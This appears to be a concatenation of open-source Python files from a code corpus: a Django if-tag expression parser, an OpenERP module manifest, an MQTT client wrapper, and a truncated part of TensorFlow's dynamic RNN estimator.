def prefix(bp, func):
"""
Creates a prefix operator, given a binding power and a function that
evaluates the node.
"""
class Operator(TokenBase):
lbp = bp
def nud(self, parser):
self.first = parser.expression(bp)
self.second = None
return self
def eval(self, context):
try:
return func(context, self.first)
except Exception:
return False
return Operator
# Operator precedence follows Python.
# NB - we can get slightly more accurate syntax error messages by not using the
# same object for '==' and '='.
# We defer variable evaluation to the lambda to ensure that terms are
# lazily evaluated using Python's boolean parsing logic.
OPERATORS = {
'or': infix(6, lambda context, x, y: x.eval(context) or y.eval(context)),
'and': infix(7, lambda context, x, y: x.eval(context) and y.eval(context)),
'not': prefix(8, lambda context, x: not x.eval(context)),
'in': infix(9, lambda context, x, y: x.eval(context) in y.eval(context)),
'not in': infix(9, lambda context, x, y: x.eval(context) not in y.eval(context)),
'=': infix(10, lambda context, x, y: x.eval(context) == y.eval(context)),
'==': infix(10, lambda context, x, y: x.eval(context) == y.eval(context)),
'!=': infix(10, lambda context, x, y: x.eval(context) != y.eval(context)),
'>': infix(10, lambda context, x, y: x.eval(context) > y.eval(context)),
'>=': infix(10, lambda context, x, y: x.eval(context) >= y.eval(context)),
'<': infix(10, lambda context, x, y: x.eval(context) < y.eval(context)),
'<=': infix(10, lambda context, x, y: x.eval(context) <= y.eval(context)),
}
# Assign 'id' to each:
for key, op in OPERATORS.items():
op.id = key
class Literal(TokenBase):
"""
A basic self-resolvable object similar to a Django template variable.
"""
# IfParser uses Literal in create_var, but TemplateIfParser overrides
# create_var so that a proper implementation that actually resolves
# variables, filters etc is used.
id = "literal"
lbp = 0
def __init__(self, value):
self.value = value
def display(self):
return repr(self.value)
def nud(self, parser):
return self
def eval(self, context):
return self.value
def __repr__(self):
return "(%s %r)" % (self.id, self.value)
class EndToken(TokenBase):
lbp = 0
def nud(self, parser):
raise parser.error_class("Unexpected end of expression in if tag.")
EndToken = EndToken()
class IfParser(object):
error_class = ValueError
def __init__(self, tokens):
# pre-pass necessary to turn 'not','in' into single token
l = len(tokens)
mapped_tokens = []
i = 0
while i < l:
token = tokens[i]
if token == "not" and i + 1 < l and tokens[i+1] == "in":
token = "not in"
i += 1 # skip 'in'
mapped_tokens.append(self.translate_token(token))
i += 1
self.tokens = mapped_tokens
self.pos = 0
self.current_token = self.next_token()
def translate_token(self, token):
try:
op = OPERATORS[token]
except (KeyError, TypeError):
return self.create_var(token)
else:
return op()
def next_token(self):
if self.pos >= len(self.tokens):
return EndToken
else:
retval = self.tokens[self.pos]
self.pos += 1
return retval
def parse(self):
retval = self.expression()
# Check that we have exhausted all the tokens
if self.current_token is not EndToken:
raise self.error_class("Unused '%s' at end of if expression." %
self.current_token.display())
return retval
def expression(self, rbp=0):
t = self.current_token
self.current_token = self.next_token()
left = t.nud(self)
while rbp < self.current_token.lbp:
t = self.current_token
self.current_token = self.next_token()
left = t.led(left, self)
return left
def create_var(self, value):
return Literal(value)
|
jmesteve/openerpseda | refs/heads/master | openerp/addons_extra/base_extend/__openerp__.py | 2 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (c) 2013 jmesteve All Rights Reserved
# https://github.com/jmesteve
# <jmesteve@me.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Base Extend',
'version': '1.0',
'author': 'jmesteve',
'category': 'Hidden',
'description': """
[ENG] Extend module base .
""",
'website': 'https://github.com/jmesteve',
'license': 'AGPL-3',
'images': [],
'depends' : ['base'],
'data': ['base_extend.xml'],
'demo': [],
'installable': True,
'application': True,
'auto_install': False,
}
|
robotarium/vizier | refs/heads/master | vizier/mqttinterface.py | 1 | import paho.mqtt.client as mqtt
import queue
import threading
import string
import random
import enum
import vizier.log as log
# CountDownLatch for some MQTT client checking
class _CountDownLatch():
"""This class handles some synchronization behind starting the paho MQTT client
Attributes:
_cv (threading.Condition): Condition variable for waiting on the countdown.
_count (int): Current count of the latch. Calls to wait return when count reaches 0.
"""
def __init__(self, count=1):
self._cv = threading.Condition()
self._count = count
def _counted_down(self):
"""Helper function to determine if the countdown has occured"""
return self._count <= 0
def count_down(self):
"""Thread safe. When the count reaches 0, all waits return"""
with self._cv:
self._count -= 1
self._count = max(self._count, 0)
if(self._count <= 0):
self._cv.notify_all()
def wait(self, timeout=None):
"""Thread safe. Waits for the count to reach 0.
Args:
timeout (double): timeout to wait on latch.
"""
with self._cv:
self._cv.wait_for(self._counted_down, timeout=timeout)
class _Task(enum.Enum):
RECONNECT = 0
class MQTTInterface:
"""This is a wrapper around the Paho MQTT interface with enhanced functionality
Attributes:
host (str): The MQTT broker's host to which this client connects.
port (int): The MQTT broker's port to which this client connects.
"""
def __init__(self, port=1884, keep_alive=5, host="localhost"):
# Set up MQTT client
self._host = host
self._port = port
self._keep_alive = keep_alive
# Internal thread to handle reconnects/resubscribes
self._reconnect_thread = None
self._signal_reconnect = queue.Queue()
# Lock for the various methods
self._lock = threading.Lock()
# Generate a suitably random ID for the MQTT client
self._id = 'python_mqtt_' + ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(30))
self._client = mqtt.Client(client_id=self._id)
self._client.on_message = self._on_message
# TODO: Don't hardcode 1
self._client.reconnect_delay_set(min_delay=1, max_delay=self._keep_alive)
# Set up on_connect
self._cdl = _CountDownLatch(1)
self._client.on_connect = self._on_connect
# I shouldn't need a lock for this...
self._callbacks = {}
self._logger = log.get_logger()
self._stopped = False
self._started = False
def _on_connect(self, client, userdata, flags, rc):
"""Called whenever the MQTT client connects to the MQTT broker.
It's also called when the client reconnects, so we handle signaling the reconnect thread in this as well.
Args:
Unused for now.
"""
self._logger.info('MQTT client successfully connected to broker on host: {0}, port: {1}'.format(self._host, self._port))
self._cdl.count_down()
# Signal reconnect thread to reconnect
self._signal_reconnect.put(_Task.RECONNECT)
def _internal_reconnect_task(self):
"""Meant to be run in an internal thread that handles reconnects.
This may seem a little weird, but reconnections must be handled this way due to the underlying implementation of the
Paho MQTT library.
"""
msg = -1
# Thread stops when None is enqueued
while (msg is not None):
msg = self._signal_reconnect.get()
# msg can only be one of the enum items
if(msg == _Task.RECONNECT):
self._logger.info('Reconnect message received. Resubscribing to topics ({}).'.format(self._callbacks.keys()))
with self._lock:
for sub in self._callbacks.keys():
self._client.subscribe(sub)
def _on_message(self, client, userdata, msg):
"""Thread safe. Callback handling messages from the client. Either puts the message into a callback or a channel
Args:
client: Client from which message was recieved.
userdata: Data about the client.
msg: MQTT payload.
"""
callback = self._callbacks.get(msg.topic)
if(callback is not None):
callback(msg.payload)
def subscribe_with_callback(self, channel, callback):
"""Thread safe. Subscribes to a channel with a callback using the underlying MQTT client.
All messages to that channel will be passed into the callback.
Args:
channel (str): Channel to which the node subscribes.
callback (function): Callback function for the topic.
"""
with self._lock:
self._callbacks.update({channel: callback})
self._client.subscribe(channel)
def subscribe(self, channel):
"""Thread safe. A subscribe routine that yields a queue to which all subsequent messages to the given topic will be passed.
Args:
channel (str): Channel to which the client will subscribe.
Returns:
A queue containing all future messages from the supplied channel.
"""
# Should be thread safe, since locking is handled in subscribe_with_callback
q = queue.Queue()
def f(msg):
nonlocal q
q.put(msg)
self.subscribe_with_callback(channel, f)
return q
def unsubscribe(self, channel):
"""Thread safe. Unsubscribes from a particular channel.
Args:
channel (str): Channel from which the client unsubscribes.
"""
with self._lock:
self._client.unsubscribe(channel)
self._callbacks.pop(channel, None)
def send_message(self, channel, message):
"""Thread safe. Sends a message on the MQTT client.
Args:
channel (str): string (channel on which to send message).
message (bytes): Message to be sent. Should be in an encoded bytes format (like UTF-8).
"""
self._client.publish(channel, message)
def start(self, timeout=None):
"""Handles starting the underlying MQTT client."""
if(self._started):
error_msg = 'Cannot call start more than once.'
self._logger.error(error_msg)
raise ValueError(error_msg)
if(self._stopped):
error_msg = 'Cannot call start after calling stop.'
self._logger.error(error_msg)
raise ValueError(error_msg)
self._started = True
# Attempt to connect the client to the specified broker
try:
self._client.connect(self._host, self._port, self._keep_alive)
except Exception as e:
error_msg = 'MQTT client could not connect to broker at host: {0}, port: {1}'.format(self._host, self._port)
self._logger.error(error_msg)
self._logger.error(repr(e))
raise RuntimeError(error_msg)
# Starts MQTT client in background thread. This has to be done before the client will process any messages
self._client.loop_start()
# Start the reconnect thread
self._reconnect_thread = threading.Thread(target=self._internal_reconnect_task)
self._reconnect_thread.start()
# Have to start client before we wait on CDL. Client won't process any messages until we start it
self._cdl.wait(timeout=timeout)
def stop(self):
"""Handles stopping the MQTT client."""
if(self._started):
# Stop reconnect thread
self._signal_reconnect.put(None)
self._reconnect_thread.join()
# Stops MQTT client
self._client.loop_stop()
else:
error_msg = 'Cannot call stop before calling start.'
self._logger.error(error_msg)
raise ValueError(error_msg)
|
tillahoffmann/tensorflow | refs/heads/master | tensorflow/contrib/learn/python/learn/estimators/dynamic_rnn_estimator.py | 46 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Estimator for Dynamic RNNs."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.contrib import layers
from tensorflow.contrib.layers.python.layers import optimizers
from tensorflow.contrib.learn.python.learn.estimators import constants
from tensorflow.contrib.learn.python.learn.estimators import estimator
from tensorflow.contrib.learn.python.learn.estimators import model_fn
from tensorflow.contrib.learn.python.learn.estimators import prediction_key
from tensorflow.contrib.learn.python.learn.estimators import rnn_common
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import rnn
from tensorflow.python.training import momentum as momentum_opt
from tensorflow.python.util import nest
# TODO(jtbates): Remove PredictionType when all non-experimental targets which
# depend on it point to rnn_common.PredictionType.
class PredictionType(object):
SINGLE_VALUE = 1
MULTIPLE_VALUE = 2
def _get_state_name(i):
"""Constructs the name string for state component `i`."""
return '{}_{}'.format(rnn_common.RNNKeys.STATE_PREFIX, i)
def state_tuple_to_dict(state):
"""Returns a dict containing flattened `state`.
Args:
state: A `Tensor` or a nested tuple of `Tensors`. All of the `Tensor`s must
have the same rank and agree on all dimensions except the last.
Returns:
A dict containing the `Tensor`s that make up `state`. The keys of the dict
are of the form "STATE_PREFIX_i" where `i` is the place of this `Tensor`
in a depth-first traversal of `state`.
"""
with ops.name_scope('state_tuple_to_dict'):
flat_state = nest.flatten(state)
state_dict = {}
for i, state_component in enumerate(flat_state):
state_name = _get_state_name(i)
state_value = (None if state_component is None
else array_ops.identity(state_component, name=state_name))
state_dict[state_name] = state_value
return state_dict
def dict_to_state_tuple(input_dict, cell):
"""Reconstructs nested `state` from a dict containing state `Tensor`s.
Args:
input_dict: A dict of `Tensor`s.
cell: An instance of `RNNCell`.
Returns:
If `input_dict` does not contain keys 'STATE_PREFIX_i' for `0 <= i < n`
where `n` is the number of nested entries in `cell.state_size`, this
function returns `None`. Otherwise, returns a `Tensor` if `cell.state_size`
is an `int` or a nested tuple of `Tensor`s if `cell.state_size` is a nested
tuple.
Raises:
ValueError: State is partially specified. The `input_dict` must contain
values for all state components or none at all.
"""
flat_state_sizes = nest.flatten(cell.state_size)
state_tensors = []
with ops.name_scope('dict_to_state_tuple'):
for i, state_size in enumerate(flat_state_sizes):
state_name = _get_state_name(i)
state_tensor = input_dict.get(state_name)
if state_tensor is not None:
rank_check = check_ops.assert_rank(
state_tensor, 2, name='check_state_{}_rank'.format(i))
shape_check = check_ops.assert_equal(
array_ops.shape(state_tensor)[1],
state_size,
name='check_state_{}_shape'.format(i))
with ops.control_dependencies([rank_check, shape_check]):
state_tensor = array_ops.identity(state_tensor, name=state_name)
state_tensors.append(state_tensor)
if not state_tensors:
return None
elif len(state_tensors) == len(flat_state_sizes):
dummy_state = cell.zero_state(batch_size=1, dtype=dtypes.bool)
return nest.pack_sequence_as(dummy_state, state_tensors)
else:
raise ValueError(
'RNN state was partially specified.'
'Expected zero or {} state Tensors; got {}'.
format(len(flat_state_sizes), len(state_tensors)))
def _concatenate_context_input(sequence_input, context_input):
"""Replicates `context_input` across all timesteps of `sequence_input`.
Expands dimension 1 of `context_input` then tiles it `sequence_length` times.
This value is appended to `sequence_input` on dimension 2 and the result is
returned.
Args:
sequence_input: A `Tensor` of dtype `float32` and shape `[batch_size,
padded_length, d0]`.
context_input: A `Tensor` of dtype `float32` and shape `[batch_size, d1]`.
Returns:
A `Tensor` of dtype `float32` and shape `[batch_size, padded_length,
d0 + d1]`.
Raises:
ValueError: If `sequence_input` does not have rank 3 or `context_input` does
not have rank 2.
"""
seq_rank_check = check_ops.assert_rank(
sequence_input,
3,
message='sequence_input must have rank 3',
data=[array_ops.shape(sequence_input)])
seq_type_check = check_ops.assert_type(
sequence_input,
dtypes.float32,
message='sequence_input must have dtype float32; got {}.'.format(
sequence_input.dtype))
ctx_rank_check = check_ops.assert_rank(
context_input,
2,
message='context_input must have rank 2',
data=[array_ops.shape(context_input)])
ctx_type_check = check_ops.assert_type(
context_input,
dtypes.float32,
message='context_input must have dtype float32; got {}.'.format(
context_input.dtype))
with ops.control_dependencies(
[seq_rank_check, seq_type_check, ctx_rank_check, ctx_type_check]):
padded_length = array_ops.shape(sequence_input)[1]
tiled_context_input = array_ops.tile(
array_ops.expand_dims(context_input, 1),
array_ops.concat([[1], [padded_length], [1]], 0))
return array_ops.concat([sequence_input, tiled_context_input], 2)
def build_sequence_input(features,
sequence_feature_columns,
context_feature_columns,
weight_collections=None,
scope=None):
"""Combine sequence and context features into input for an RNN.
Args:
features: A `dict` containing the input and (optionally) sequence length
information and initial state.
sequence_feature_columns: An iterable containing all the feature columns
describing sequence features. All items in the set should be instances
of classes derived from `FeatureColumn`.
context_feature_columns: An iterable containing all the feature columns
describing context features i.e. features that apply across all time
steps. All items in the set should be instances of classes derived from
`FeatureColumn`.
weight_collections: List of graph collections to which weights are added.
scope: Optional scope, passed through to parsing ops.
Returns:
A `Tensor` of dtype `float32` and shape `[batch_size, padded_length, ?]`.
This will be used as input to an RNN.
"""
features = features.copy()
features.update(layers.transform_features(
features,
list(sequence_feature_columns) + list(context_feature_columns or [])))
sequence_input = layers.sequence_input_from_feature_columns(
columns_to_tensors=features,
feature_columns=sequence_feature_columns,
weight_collections=weight_collections,
scope=scope)
if context_feature_columns is not None:
context_input = layers.input_from_feature_columns(
columns_to_tensors=features,
feature_columns=context_feature_columns,
weight_collections=weight_collections,
scope=scope)
sequence_input = _concatenate_context_input(sequence_input, context_input)
return sequence_input
def construct_rnn(initial_state,
sequence_input,
cell,
num_label_columns,
dtype=dtypes.float32,
parallel_iterations=32,
swap_memory=True):
"""Build an RNN and apply a fully connected layer to get the desired output.
Args:
initial_state: The initial state to pass the RNN. If `None`, the
default starting state for `self._cell` is used.
sequence_input: A `Tensor` with shape `[batch_size, padded_length, d]`
that will be passed as input to the RNN.
cell: An initialized `RNNCell`.
num_label_columns: The desired output dimension.
dtype: dtype of `cell`.
parallel_iterations: Number of iterations to run in parallel. Values >> 1
use more memory but take less time, while smaller values use less memory
but computations take longer.
swap_memory: Transparently swap the tensors produced in forward inference
but needed for back prop from GPU to CPU. This allows training RNNs
which would typically not fit on a single GPU, with very minimal (or no)
performance penalty.
Returns:
activations: The output of the RNN, projected to `num_label_columns`
dimensions.
final_state: A `Tensor` or nested tuple of `Tensor`s representing the final
state output by the RNN.
"""
with ops.name_scope('RNN'):
rnn_outputs, final_state = rnn.dynamic_rnn(
cell=cell,
inputs=sequence_input,
initial_state=initial_state,
dtype=dtype,
parallel_iterations=parallel_iterations,
swap_memory=swap_memory,
time_major=False)
activations = layers.fully_connected(
inputs=rnn_outputs,
num_outputs=num_label_columns,
activation_fn=None,
trainable=True)
return activations, final_state
def _single_value_predictions(activations,
sequence_length,
target_column,
problem_type,
predict_probabilities):
"""Maps `activations` from the RNN to predictions for single value models.
If `predict_probabilities` is `False`, this function returns a `dict`
containing single entry with key `PREDICTIONS_KEY`. If `predict_probabilities`
is `True`, it will contain a second entry with key `PROBABILITIES_KEY`. The
value of this entry is a `Tensor` of probabilities with shape
`[batch_size, num_classes]`.
Args:
activations: Output from an RNN. Should have dtype `float32` and shape
`[batch_size, padded_length, ?]`.
sequence_length: A `Tensor` with shape `[batch_size]` and dtype `int32`
containing the length of each sequence in the batch. If `None`, sequences
are assumed to be unpadded.
target_column: An initialized `TargetColumn`, calculate predictions.
problem_type: Either `ProblemType.CLASSIFICATION` or
`ProblemType.LINEAR_REGRESSION`.
predict_probabilities: A Python boolean, indicating whether probabilities
should be returned. Should only be set to `True` for
classification/logistic regression problems.
Returns:
A `dict` mapping strings to `Tensors`.
"""
with ops.name_scope('SingleValuePrediction'):
last_activations = rnn_common.select_last_activations(
activations, sequence_length)
predictions_name = (prediction_key.PredictionKey.CLASSES
if problem_type == constants.ProblemType.CLASSIFICATION
else prediction_key.PredictionKey.SCORES)
if predict_probabilities:
probabilities = target_column.logits_to_predictions(
last_activations, proba=True)
prediction_dict = {
prediction_key.PredictionKey.PROBABILITIES: probabilities,
predictions_name: math_ops.argmax(probabilities, 1)}
else:
predictions = target_column.logits_to_predictions(
last_activations, proba=False)
prediction_dict = {predictions_name: predictions}
return prediction_dict
def _multi_value_loss(
activations, labels, sequence_length, target_column, features):
"""Maps `activations` from the RNN to loss for multi value models.
Args:
activations: Output from an RNN. Should have dtype `float32` and shape
`[batch_size, padded_length, ?]`.
labels: A `Tensor` with length `[batch_size, padded_length]`.
sequence_length: A `Tensor` with shape `[batch_size]` and dtype `int32`
containing the length of each sequence in the batch. If `None`, sequences
are assumed to be unpadded.
target_column: An initialized `TargetColumn`, calculate predictions.
features: A `dict` containing the input and (optionally) sequence length
information and initial state.
Returns:
A scalar `Tensor` containing the loss.
"""
with ops.name_scope('MultiValueLoss'):
activations_masked, labels_masked = rnn_common.mask_activations_and_labels(
activations, labels, sequence_length)
return target_column.loss(activations_masked, labels_masked, features)
def _single_value_loss(
activations, labels, sequence_length, target_column, features):
"""Maps `activations` from the RNN to loss for multi value models.
Args:
activations: Output from an RNN. Should have dtype `float32` and shape
`[batch_size, padded_length, ?]`.
labels: A `Tensor` with length `[batch_size]`.
sequence_length: A `Tensor` with shape `[batch_size]` and dtype `int32`
containing the length of each sequence in the batch. If `None`, sequences
are assumed to be unpadded.
target_column: An initialized `TargetColumn`, calculate predictions.
features: A `dict` containing the input and (optionally) sequence length
information and initial state.
Returns:
A scalar `Tensor` containing the loss.
"""
with ops.name_scope('SingleValueLoss'):
last_activations = rnn_common.select_last_activations(
activations, sequence_length)
return target_column.loss(last_activations, labels, features)
def _get_output_alternatives(prediction_type,
problem_type,
prediction_dict):
"""Constructs output alternatives dict for `ModelFnOps`.
Args:
prediction_type: either `MULTIPLE_VALUE` or `SINGLE_VALUE`.
problem_type: either `CLASSIFICATION` or `LINEAR_REGRESSION`.
prediction_dict: a dictionary mapping strings to `Tensor`s containing
predictions.
Returns:
`None` or a dictionary mapping a string to an output alternative.
Raises:
ValueError: `prediction_type` is not one of `SINGLE_VALUE` or
`MULTIPLE_VALUE`.
"""
if prediction_type == rnn_common.PredictionType.MULTIPLE_VALUE:
return None
if prediction_type == rnn_common.PredictionType.SINGLE_VALUE:
prediction_dict_no_state = {
k: v
for k, v in prediction_dict.items()
if rnn_common.RNNKeys.STATE_PREFIX not in k
}
return {'dynamic_rnn_output': (problem_type, prediction_dict_no_state)}
raise ValueError('Unrecognized prediction_type: {}'.format(prediction_type))
def _get_dynamic_rnn_model_fn(
cell_type,
num_units,
target_column,
problem_type,
prediction_type,
optimizer,
sequence_feature_columns,
context_feature_columns=None,
predict_probabilities=False,
learning_rate=None,
gradient_clipping_norm=None,
dropout_keep_probabilities=None,
sequence_length_key=rnn_common.RNNKeys.SEQUENCE_LENGTH_KEY,
dtype=dtypes.float32,
parallel_iterations=None,
swap_memory=True,
name='DynamicRNNModel'):
"""Creates an RNN model function for an `Estimator`.
The model function returns an instance of `ModelFnOps`. When
`problem_type == ProblemType.CLASSIFICATION` and
`predict_probabilities == True`, the returned `ModelFnOps` includes an output
alternative containing the classes and their associated probabilities. When
`predict_probabilities == False`, only the classes are included. When
`problem_type == ProblemType.LINEAR_REGRESSION`, the output alternative
contains only the predicted values.
Args:
cell_type: A string, a subclass of `RNNCell` or an instance of an `RNNCell`.
num_units: A single `int` or a list of `int`s. The size of the `RNNCell`s.
target_column: An initialized `TargetColumn`, used to calculate prediction
and loss.
problem_type: `ProblemType.CLASSIFICATION` or
`ProblemType.LINEAR_REGRESSION`.
prediction_type: `PredictionType.SINGLE_VALUE` or
`PredictionType.MULTIPLE_VALUE`.
optimizer: A subclass of `Optimizer`, an instance of an `Optimizer` or a
string.
sequence_feature_columns: An iterable containing all the feature columns
describing sequence features. All items in the set should be instances
of classes derived from `FeatureColumn`.
context_feature_columns: An iterable containing all the feature columns
describing context features, i.e., features that apply across all time
steps. All items in the set should be instances of classes derived from
`FeatureColumn`.
predict_probabilities: A boolean indicating whether to predict probabilities
for all classes. Must only be used with
`ProblemType.CLASSIFICATION`.
learning_rate: Learning rate used for optimization. This argument has no
effect if `optimizer` is an instance of an `Optimizer`.
gradient_clipping_norm: A float. Gradients will be clipped to this value.
dropout_keep_probabilities: a list of dropout keep probabilities or `None`.
If a list is given, it must have length `len(num_units) + 1`.
sequence_length_key: The key that will be used to look up sequence length in
the `features` dict.
dtype: The dtype of the state and output of the given `cell`.
parallel_iterations: Number of iterations to run in parallel. Values >> 1
use more memory but take less time, while smaller values use less memory
but computations take longer.
swap_memory: Transparently swap the tensors produced in forward inference
but needed for back prop from GPU to CPU. This allows training RNNs
which would typically not fit on a single GPU, with very minimal (or no)
performance penalty.
name: A string that will be used to create a scope for the RNN.
Returns:
A model function to be passed to an `Estimator`.
Raises:
ValueError: `problem_type` is not one of
`ProblemType.LINEAR_REGRESSION` or `ProblemType.CLASSIFICATION`.
ValueError: `prediction_type` is not one of `PredictionType.SINGLE_VALUE`
or `PredictionType.MULTIPLE_VALUE`.
ValueError: `predict_probabilities` is `True` for `problem_type` other
than `ProblemType.CLASSIFICATION`.
ValueError: `len(dropout_keep_probabilities)` is not `len(num_units) + 1`.
"""
if problem_type not in (constants.ProblemType.CLASSIFICATION,
constants.ProblemType.LINEAR_REGRESSION):
raise ValueError(
'problem_type must be ProblemType.LINEAR_REGRESSION or '
'ProblemType.CLASSIFICATION; got {}'.
format(problem_type))
if prediction_type not in (rnn_common.PredictionType.SINGLE_VALUE,
rnn_common.PredictionType.MULTIPLE_VALUE):
raise ValueError(
'prediction_type must be PredictionType.MULTIPLE_VALUEs or '
'PredictionType.SINGLE_VALUE; got {}'.
format(prediction_type))
if (problem_type != constants.ProblemType.CLASSIFICATION
and predict_probabilities):
raise ValueError(
'predict_probabilities can only be set to True for problem_type'
' ProblemType.CLASSIFICATION; got {}.'.format(problem_type))
def _dynamic_rnn_model_fn(features, labels, mode):
"""The model to be passed to an `Estimator`."""
with ops.name_scope(name):
sequence_length = features.get(sequence_length_key)
sequence_input = build_sequence_input(features,
sequence_feature_columns,
context_feature_columns)
dropout = (dropout_keep_probabilities
if mode == model_fn.ModeKeys.TRAIN
else None)
# This class promises to use the cell type selected by that function.
cell = rnn_common.construct_rnn_cell(num_units, cell_type, dropout)
initial_state = dict_to_state_tuple(features, cell)
rnn_activations, final_state = construct_rnn(
initial_state,
sequence_input,
cell,
target_column.num_label_columns,
dtype=dtype,
parallel_iterations=parallel_iterations,
swap_memory=swap_memory)
loss = None # Created below for modes TRAIN and EVAL.
if prediction_type == rnn_common.PredictionType.MULTIPLE_VALUE:
prediction_dict = rnn_common.multi_value_predictions(
rnn_activations, target_column, problem_type, predict_probabilities)
if mode != model_fn.ModeKeys.INFER:
loss = _multi_value_loss(
rnn_activations, labels, sequence_length, target_column, features)
elif prediction_type == rnn_common.PredictionType.SINGLE_VALUE:
prediction_dict = _single_value_predictions(
rnn_activations, sequence_length, target_column,
problem_type, predict_probabilities)
if mode != model_fn.ModeKeys.INFER:
loss = _single_value_loss(
rnn_activations, labels, sequence_length, target_column, features)
state_dict = state_tuple_to_dict(final_state)
prediction_dict.update(state_dict)
eval_metric_ops = None
if mode != model_fn.ModeKeys.INFER:
eval_metric_ops = rnn_common.get_eval_metric_ops(
problem_type, prediction_type, sequence_length, prediction_dict,
labels)
train_op = None
if mode == model_fn.ModeKeys.TRAIN:
train_op = optimizers.optimize_loss(
loss=loss,
global_step=None, # Get it internally.
learning_rate=learning_rate,
optimizer=optimizer,
clip_gradients=gradient_clipping_norm,
summaries=optimizers.OPTIMIZER_SUMMARIES)
output_alternatives = _get_output_alternatives(prediction_type,
problem_type,
prediction_dict)
return model_fn.ModelFnOps(mode=mode,
predictions=prediction_dict,
loss=loss,
train_op=train_op,
eval_metric_ops=eval_metric_ops,
output_alternatives=output_alternatives)
return _dynamic_rnn_model_fn
class DynamicRnnEstimator(estimator.Estimator):
def __init__(self,
problem_type,
prediction_type,
sequence_feature_columns,
context_feature_columns=None,
num_classes=None,
num_units=None,
cell_type='basic_rnn',
optimizer='SGD',
learning_rate=0.1,
predict_probabilities=False,
momentum=None,
gradient_clipping_norm=5.0,
dropout_keep_probabilities=None,
model_dir=None,
feature_engineering_fn=None,
config=None):
"""Initializes a `DynamicRnnEstimator`.
The input function passed to this `Estimator` optionally contains keys
`RNNKeys.SEQUENCE_LENGTH_KEY`. The value corresponding to
`RNNKeys.SEQUENCE_LENGTH_KEY` must be vector of size `batch_size` where
entry `n` corresponds to the length of the `n`th sequence in the batch. The
sequence length feature is required for batches of varying sizes. It will be
used to calculate loss and evaluation metrics. If
`RNNKeys.SEQUENCE_LENGTH_KEY` is not included, all sequences are assumed to
have length equal to the size of dimension 1 of the input to the RNN.
In order to specify an initial state, the input function must include keys
`STATE_PREFIX_i` for all `0 <= i < n` where `n` is the number of nested
elements in `cell.state_size`. The input function must contain values for
all state components or none of them. If none are included, then the default
(zero) state is used as an initial state. See the documentation for
`dict_to_state_tuple` and `state_tuple_to_dict` for further details.
The input function can call rnn_common.construct_rnn_cell() to obtain the
same cell type that this class will select from arguments to __init__.
The `predict()` method of the `Estimator` returns a dictionary with keys
`STATE_PREFIX_i` for `0 <= i < n` where `n` is the number of nested elements
in `cell.state_size`, along with `PredictionKey.CLASSES` for problem type
`CLASSIFICATION` or `PredictionKey.SCORES` for problem type
`LINEAR_REGRESSION`. The value keyed by
`PredictionKey.CLASSES` or `PredictionKey.SCORES` has shape
`[batch_size, padded_length]` in the multi-value case and shape
`[batch_size]` in the single-value case. Here, `padded_length` is the
largest value in the `RNNKeys.SEQUENCE_LENGTH` `Tensor` passed as input.
Entry `[i, j]` is the prediction associated with sequence `i` and time step
`j`. If the problem type is `CLASSIFICATION` and `predict_probabilities` is
`True`, it will also include key`PredictionKey.PROBABILITIES`.
Args:
problem_type: whether the `Estimator` is intended for a regression or
classification problem. Value must be one of
`ProblemType.CLASSIFICATION` or `ProblemType.LINEAR_REGRESSION`.
prediction_type: whether the `Estimator` should return a value for each
step in the sequence, or just a single value for the final time step.
Must be one of `PredictionType.SINGLE_VALUE` or
`PredictionType.MULTIPLE_VALUE`.
sequence_feature_columns: An iterable containing all the feature columns
describing sequence features. All items in the iterable should be
instances of classes derived from `FeatureColumn`.
context_feature_columns: An iterable containing all the feature columns
describing context features, i.e., features that apply across all time
steps. All items in the set should be instances of classes derived from
`FeatureColumn`.
num_classes: the number of classes for a classification problem. Only
used when `problem_type=ProblemType.CLASSIFICATION`.
num_units: A list of integers indicating the number of units in the
`RNNCell`s in each layer.
cell_type: A subclass of `RNNCell` or one of 'basic_rnn,' 'lstm' or 'gru'.
optimizer: The type of optimizer to use. Either a subclass of
`Optimizer`, an instance of an `Optimizer`, a callback that returns an
optimizer, or a string. Strings must be one of 'Adagrad', 'Adam',
'Ftrl', 'Momentum', 'RMSProp' or 'SGD. See `layers.optimize_loss` for
more details.
learning_rate: Learning rate. This argument has no effect if `optimizer`
is an instance of an `Optimizer`.
predict_probabilities: A boolean indicating whether to predict
probabilities for all classes. Used only if `problem_type` is
`ProblemType.CLASSIFICATION`
momentum: Momentum value. Only used if `optimizer_type` is 'Momentum'.
gradient_clipping_norm: Parameter used for gradient clipping. If `None`,
then no clipping is performed.
dropout_keep_probabilities: a list of dropout probabilities or `None`.
If a list is given, it must have length `len(num_units) + 1`. If
`None`, then no dropout is applied.
model_dir: The directory in which to save and restore the model graph,
parameters, etc.
feature_engineering_fn: Takes features and labels which are the output of
`input_fn` and returns features and labels which will be fed into
`model_fn`. Please check `model_fn` for a definition of features and
labels.
config: A `RunConfig` instance.
Raises:
ValueError: `problem_type` is not one of
`ProblemType.LINEAR_REGRESSION` or `ProblemType.CLASSIFICATION`.
ValueError: `problem_type` is `ProblemType.CLASSIFICATION` but
`num_classes` is not specifieProblemType
ValueError: `prediction_type` is not one of
`PredictionType.MULTIPLE_VALUE` or `PredictionType.SINGLE_VALUE`.
"""
if prediction_type == rnn_common.PredictionType.MULTIPLE_VALUE:
